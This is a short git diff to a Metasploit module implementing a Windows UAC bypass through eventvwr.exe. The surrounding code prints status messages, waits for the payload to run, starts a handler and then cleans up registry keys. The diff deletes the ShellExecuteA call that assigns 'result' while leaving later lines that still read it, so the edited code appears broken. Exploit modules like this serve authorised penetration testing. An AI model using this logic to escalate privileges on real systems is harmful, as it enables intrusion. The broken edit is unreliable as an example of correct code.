diff --git a/modules/exploits/windows/local/bypassuac_eventvwr.rb b/modules/exploits/windows/local/bypassuac_eventvwr.rb index aff3d1e062..a7b4ab7418 100644 --- a/modules/exploits/windows/local/bypassuac_eventvwr.rb +++ b/modules/exploits/windows/local/bypassuac_eventvwr.rb @@ -131,16 +131,15 @@ class MetasploitModule < Msf::Exploit::Local cmd_path = expand_path("#{eventvwr_cmd}") print_status("Executing payload: #{cmd_path}") - result = client.railgun.shell32.ShellExecuteA(nil, 'open', cmd_path, nil, nil, 'SW_HIDE') - + if result['return'] > 32 then print_good("eventvwr.exe executed successfully, waiting 5 seconds for the payload to execute.") Rex::sleep(5) else print_error("eventvwr.exe execution failed with Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}") end - + handler(client) print_status("Cleaning up registry keys ...")